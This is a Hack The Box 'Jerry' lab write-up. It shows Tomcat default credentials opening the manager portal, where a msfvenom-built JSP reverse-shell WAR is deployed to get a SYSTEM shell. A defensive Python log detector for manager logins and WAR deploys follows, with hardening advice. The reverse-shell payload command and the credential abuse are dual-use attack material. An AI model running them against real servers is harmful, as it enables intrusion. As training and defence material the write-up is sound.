Hack The Box — Jerry — without Metasploit (TJNull’s list for OSCP)
This is my 4th write-up for Jerry, a machine from TJNull’s list of HackTheBox machines for OSCP Practice. The full list can be found here.
In a general penetration test or a CTF, there are usually three major phases involved:
- Enumeration and Scanning (Information Gathering).
- Initial Foothold.
- Privilege Escalation.
Let’s get started with the box!
Enumeration
In order to hack into a system we first need to gather some information about it. For that, we use Nmap to scan the ports of the target machine and find out which services are running, i.e. which services we can target.
nmap -sC -sV -A -T4 -p- 10.129.72.115
- -sC is used to run default scripts to enumerate the services further.
- -sV is used for version enumeration of the services.
- -A is used for an aggressive scan (not usually recommended in a real environment).
- -T4 is used to set the number of parallel threads.
- -p- is used to do a full port scan from 1–65535.
So, there appears to be only one port open: 8080 (Apache Tomcat/7.0.88). Let’s visit the web page and see what we have.
It’s just the default Tomcat page. Here we can see a button for Manager App.
By its name it seems to be the management portal. Let’s navigate to it.
It gives a login prompt. We don’t have credentials yet, so we click Cancel. As soon as we click Cancel, the server returns an Error 401 page. If we read the content of that page, we can see possible user credentials, tomcat:s3cret (I didn’t know whether those credentials were valid or just an example for demonstration.)
Exploitation
Note: At first I tried different exploits for CVE-2017-12617 but none of them worked, maybe because it requires the PUT method to be enabled and we don’t have it enabled on the current web server. But I am skipping all those failed attempts because we are gonna stick to the thing that actually worked. I am telling you this only to say that it took me some failed attempts as well, and if you had them too, you are not the only one. :)
Let’s go back and try these credentials.
And fortunately the credentials turned out to be valid.
If we look at the bottom of this page we can find the “WAR file to deploy” section. From there we can upload a WAR package and deploy it on the web server.
Let’s use msfvenom to generate a WAR reverse shell.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o shell.war
Let’s upload it from the management portal and click Deploy.
After the WAR package has been uploaded, we can see it in the Applications section.
Let’s start a listener first.
Now, by clicking on /shell in the Applications section of the portal, we get a reverse shell.
And we got an nt authority\system shell, which means we have full administrative privileges and don’t need to do any privilege escalation.
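From the defender’s side, the manager login and WAR deployment above leave a recognisable trail in Tomcat’s access log: a 401 on /manager/html followed by a 200 from the same client, then a POST to the manager upload endpoint. The following Python is an added example, not part of the original write-up; the log lines are constructed, and /manager/html/upload and /manager/text/deploy are the standard Tomcat manager deployment endpoints.

```python
import re
from collections import defaultdict

# Apache/Tomcat "common" access-log format; the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that deploy a new web application (HTML upload form and text API).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")

SAMPLE_LOG = """\
10.10.14.5 - - [14/Jul/2021:10:02:11 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.5 - tomcat [14/Jul/2021:10:02:20 +0000] "GET /manager/html HTTP/1.1" 200 15203
10.10.14.5 - tomcat [14/Jul/2021:10:03:01 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 16011
10.10.14.5 - - [14/Jul/2021:10:03:15 +0000] "GET /shell/ HTTP/1.1" 200 0
10.10.14.9 - - [14/Jul/2021:10:05:00 +0000] "GET /docs/ HTTP/1.1" 200 4090
"""

def parse(line):
    """Return a dict of fields for one access-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text):
    """Return (ip, alert, path) tuples for manager logins that follow a 401 and for WAR deployments."""
    alerts = []
    saw_401 = defaultdict(bool)  # ip -> was this client previously refused by the manager?
    for raw in log_text.splitlines():
        rec = parse(raw)
        if rec is None:
            continue
        ip, path, status = rec["ip"], rec["path"].split("?", 1)[0], rec["status"]
        if path.startswith("/manager/") and status == "401":
            saw_401[ip] = True
        elif path.startswith("/manager/") and status == "200" and saw_401[ip]:
            alerts.append((ip, "manager-login-after-401", path))
            saw_401[ip] = False  # report once per successful login
        if path in DEPLOY_PATHS and rec["method"] in ("POST", "PUT") and status == "200":
            alerts.append((ip, "manager-war-deploy", path))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Restricting the manager application to local or administrative networks and removing the default tomcat-users.xml accounts prevents the sequence this script looks for.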
Let’s navigate to C:\Users\Administrator\Desktop\flags to get the flags.
EZ PZ! :)